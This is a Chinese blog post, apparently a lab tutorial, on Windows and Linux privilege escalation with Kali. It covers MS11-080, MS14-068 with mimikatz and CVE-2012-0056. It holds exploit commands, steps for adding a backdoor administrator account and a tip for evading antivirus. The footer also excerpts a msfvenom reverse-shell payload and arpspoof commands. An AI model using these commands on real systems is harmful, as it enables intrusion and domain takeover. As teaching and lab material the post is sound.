小白日记24:kali渗透测试之提权(四)--利用漏洞提权

最新推荐文章于 2024-02-26 17:35:52 发布
最新推荐文章于 2024-02-26 17:35:52 发布
阅读量5.6k 收藏 8
点赞数
分类专栏: kali 文章标签: windows漏洞提权 ms11-080 ms14-068
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zixuanfy/article/details/52667152
版权

利用漏洞提权实例

前提:已渗透进一个XP或2003系统


一、实验目标漏洞:Ms11-080

补丁:Kb2592799

漏洞信息:https://technet.microsoft.com/library/security/ms11-080



1、通过searchsploit命令查找漏洞 【注:查找漏洞的命令行窗口要能完全显示Title和Path】


#有python和ruby两种漏洞利用代码,可根据自己喜好选择,本章选择python

2、通过Sandi查找


查看漏洞利用代码的描述


#通过Afd.sys文件进行提权

###使用32位系统,XP和2003,Eng:表示适用于英文版操作系统,可能在中文上不适用

将18176.py拷贝到XP系统中【注:XP需安装python环境】


中文版XP测试


可能出现蓝屏,无法实现提权!

1、使用英文版XP进行本次实验

2、通过修改代码,使其支持中文版

#1.若系统补丁已安装,先卸载,再进行操作

#2.若系统没有自己需要的编译环境,可先把代码编译成exe执行程序

如何python脚本编译成exe执行程序?

1、下载Pyinstaller【https://pypi.python.org/pypi/PyInstaller/2.1】【功能:将其他python脚本转换为exe】

2、下载Pywin32【http://sourceforge.net/projects/pywin32/files/pywin32/Build%20219/

先安装pywin32,再将解压的pyinstaller放到python27中,将18176.py放到pyinstaller文件中,命令行模式下运行

#..\python.exe   指定系统路径

#--onefile   把库文件集成到生成的exe文件


为防止在上传到其他系统时,被杀毒软件拦截,先进行压缩


普通用户无法在C盘写入,解压到临时文件temp


提权成功,创建属于自己的管理员账号,或者提升自己为管理员权限

例如:#net user b b /add                           #net localgroup Administrators a /add


二、实验目标漏洞:MS11-046

实现DOS【蓝屏、重启】



三、Ms14-068【可将域中一台主机的普通用户提升到域管理员权限】

在企业环境中域环境管理电脑,可通过拿到域控制管理员账号权限,可控制整个域环境的电脑,甚至能控制到其他资源【如:财务系统】##微软在域方面的安全问题比较少


搭建域【域:http://www.cnblogs.com/suizhikuo/articles/2117831.html

必须使用server版操作系统作为域控制管理【如:2003】

http://www.poluoluo.com/server/200809/46996.html

##需使用静态ip地址,并且自己作为自己的DNS服务器

分配域账号密码给个人,限制可操作资源

Kali集成漏洞脚本


##生成票据文件

ms14-068.py -u user@lab.com -s userSID -d dc.lab.com

TGT:域环境的身份验证文件


#发起会话请求,获取票据 

python 35474.py -u u1@lab.com -s S-1-5-21-1174131619-510335615-37023860181-1107 -d 192.168.1.145
#域里面的SID    -d 指定域控制器名称/IP【除非kali也指定同一个DNS,否则需要写入IP地址】

登录本机,将票据文件拷贝到XP

命令行下提权

mimikatz.exe log "kerberos::ptc TGT_user@lab.com.ccache" exit

【若出现异常,可尝试重启解决】

###在客户端XP系统,不能成功,需在Win7上进行

使用mimikatz


##kali中若提示出现缺少库文件

可到此网站下载https://github.com/bidord/pykek


在linux平台上,利用漏洞提权

CVE-2012-0056【http://cve.scap.org.cn/CVE-2012-0056.html

/proc/pid/mem   #proc目录为系统启动过程中生成的临时目录,储存大量的内存目录

内核版本高于2.6.39的linux都存在该漏洞【最新的内核版本已修复】

原理:【https://git.zx2c4.com/CVE-2012-0056/about/

靶机:Ubuntu11.10【旧版ubuntu(已停止更新):http://old-releases.ubuntu.com/releases/11.10/


拷贝18411.c 到ubuntu系统

scp /usr/share/exploitdb/platforms/linux/local/18411.c admin@192.168.1.145:/home/admin/

授权chmod、运行./exp

##ubuntu早期版本中,不集成gcc命令,需手动更新

sudo apt-cdrom add && sudo apt-get install gcc

##当更新源找不到包,可用安装光盘作为更新源【光盘自带有各种包,但版本不一定是最新】

选择ISO文件,通过mount命令,挂载到mnt目录或media目录【sudo mount /dev/cdrom /media/cdrom】然后指定更新源【sudo apt-cdrom add】



子轩非鱼
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali-linux-2021.3-installer-amd64.part4.rar
09-29
kali-linux-2021.3-installer-amd64.iso适用于X64位系统,文件分割成 5个 压缩包,必须集齐5个 文件后才能一起解压一起使用: kali-linux-2021.3-installer-amd64.part5.rar ... kali-linux-2021.3-installer-amd64....
kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2343
kali-漏洞利用】应用渗透攻击过程
使用metasploit对SQL server渗透测试提权
渗透测试
05-11 639
文章目录前言一、使用nmap进行踩点二、使用metasploit进行扫描三、破解sqlserver密码、查找服务器其他用户口令五、浏览SQL server六、后渗透总结 前言 简单介绍了使用metasploit对SQL server进行渗透测试提权 一、使用nmap进行踩点 db_nmap -sV -p1433 1434 192.168.1.106 #使用nmap进行扫描 services #显示出服务 db_namp -sU --script=ms-sql-info -p1434 192.168.1
kali Linux 渗透系统的安装、提权与汉化(初识 Linux 系统)
最新发布
Welcome To Myon'Blog !
02-26 1977
当然实 root 用户的权限其实远超 Windows 管理员的权限,拥有对系统的完全控制权。我这里推荐的是下载 vmx 文件,下载后解压,在 vmware 中打开即可直接开机使用。目前我们只是普通用户,该命令为超级用户才能执行的命令,因此命令前需要加上 sudo。如果你下载的是 iso 光盘镜像文件,则需要自己进行简单配置,都好弄,看个人喜好。那么需要修改 一个文件,在 /etc/passwd 的,关于这个方法我就不再演示。在这个情况下,我们就拥有了最高权限,可以执行任意命令,而不需要加 sudo。
使用kail中Metasploit获取Windows的权限并提权
yuchen的博客
01-07 1840
0x01 环境搭建 虚拟机:kali 虚拟机:win7 0x02 实际操作 1.生成木马 2.移动木马至/var/www/html目录下 3.给木马文件evil.exe加上X权限 4.kali需要开启Apache2服务 5.用windows打开kali得ip下载木马文件 6.提前查看postgresql运行状态/etc/init.d/postgresql status 打开postgresql数据库/etc/init.d/postgresql start 打开后才会出现绿点 7.开启MSF 8
使用metasplit 提权
qq_42307546的博客
03-26 1354
生成反弹shell木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.15lport=12345 -f exe >s.exe 开启监听 console use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.15 set lport 12345 run ...
113.网络安全渗透测试—[权限提升篇11]—[Windows 2003 Mysql MOF提权]
qwsn
07-06 2065
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! mof是windows系统的一个文件,存储在,叫做"托管对象格式",其作用是每隔五秒就会去监控进程创建和死亡。然而提权的原理就是在拥有了mysql的root权限以后(其实就是获得了MySQL的启动身份),然后使用该权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs脚本段大多数写的是cmd的添加管理员用户的命令。(1)操作系统版本:Windows Server
kali-tutorial:kali渗透测试教程,Kali渗透测试指南,Kali渗透测试详解
05-12
Kali渗透教程 arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 192.168.1.3 192.168.1.1 echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t ...
安装kali-2021版本渗透测试系统-课程资料.rar
06-09
安装kali-2021版本渗透测试系统-课程资料 含kali镜像BT种子
无线渗透测试入门指南kali-linux-wireless-pentest-master.zip
01-30
无线渗透测试入门指南kali-linux-wireless-pentest-master.zip
Kali Linux VMware(kali-linux-2022.2-vmware-i386.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-i386.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: Kali Linux VMware(kali-linux-2022.2-vmware-i386.part1.rar) ... ...
Kali的Metasploit-Framework利用漏洞入侵Windows2003Server
路~可以走过
04-16 3563
根据上篇的塔建:https://blog.csdn.net/qq_41709494/article/details/89278964 #用VMware塔建Windows2003Server靶机,IP地址是:192.168.137.128 #还部分信息没截图就省略了 #塔建仅主机模式(Host-Only)网络Windows2003Server可以上网 #打勾允许其他网络用户...
metasploit mysql提权_MYSQL提权的各种姿势
weixin_31682257的博客
01-26 121
一、利用mof提权前段时间Kingcope大牛发布了mysql远程提权0day,剑心牛对MOF利用进行了分析,如下:Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的托管对象格式 (MOF) 文件:方法 1: 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。方法 2: 使用 IMofCompiler 接口和 $ CompileFile 方法。方法 ...
渗透测试提权方式总结
qq_29864185的博客
07-06 1636
目录 一、 什么是提权 二、怎样进行提权提权的方式有哪些) 1、系统漏洞提权 (1)Windows提权 (2)Linux系统提权 2、数据库提权 (1)MySQL数据库提权 3、系统配置不当提权 4、权限继承类提权 5、第三方软件/服务提权6、WebServer漏洞提权 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进
渗透怎么学?渗透测试中超全的提权思路来了!
bdfcfff77fa的博客
06-26 969
尽量能够获取webshell,如果获取不到webshell可以在有文件上传的地方上传反弹shell脚本;或者利用漏洞(系统漏洞,服务器漏洞,第三方软件漏洞漏洞)来获取shell。利用kali虚拟机msfVENOM编写反弹shell脚本被控制端发起的shell---通常用于被控制端因防火墙受限,权限不足、端口被占用。
渗透测试技术----提权(本地提权)
wwl012345的博客
07-22 2677
一、开启Kali共享文件夹(拓展,与提权无关) 1.对于很多使用虚拟机的朋友来说,最头疼的就是无法把物理机上的文件移动到虚拟机上,这有两种方法,一种是安装Vmtools软件,还有一种就是开启共享文件夹。方法如下 虚拟机–>设置–>选项–>共享文件夹–>总是启用–>添加–>选择在物理机上建立的文件夹(这一步很重要,如果没有连接到物理机上的共享文件夹,那么相当于没...
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2264
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
渗透测试提权指南
遇事不决冲冲冲
12-04 7186
windows系统提权 参考内网安全攻防:渗透测试实战指南(百度百科) 一.系统内核漏洞 利用已存在未安装补丁的漏洞进行提权 参考Windows系统内核溢出漏洞提权 1.手动寻找缺失补丁 拿到权限后通过如下命令查看系统安装了哪些补丁 systeminfo wmic qfe get caption,description,hotfixid,installedon 比CMD更强大的命令行:WMIC后渗透利用(系统命令) 通过没有列出的补丁号,寻找相应的提权EXP进行提权(挺离谱的感觉) 系统漏洞与对应的
渗透测试——提权方式总结
热门推荐
橘子女侠
06-11 3万+
(内容整理自网络) 一、 什么是提权 提权就是通过各种办法和漏洞,提高自己在服务器中的权限,以便控制全局。 Windows:User >> System Linux:User >> Root 二、怎样进行提权提权的方式有哪些) 1.、系统漏洞提权(Linux、Windows) 2、数据库提权 3、系统配置错误提权 4、权限继承类提权 5、第三方软件...
E: Unable to locate package kali-linux-full
06-09
8. 最后,输入以下命令安装kali-linux-full包: ``` apt-get install kali-linux-full ``` 在这个过程中,你可能需要输入Y来确认安装过程。安装完成后,你应该能够成功使用kali-linux-full包。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值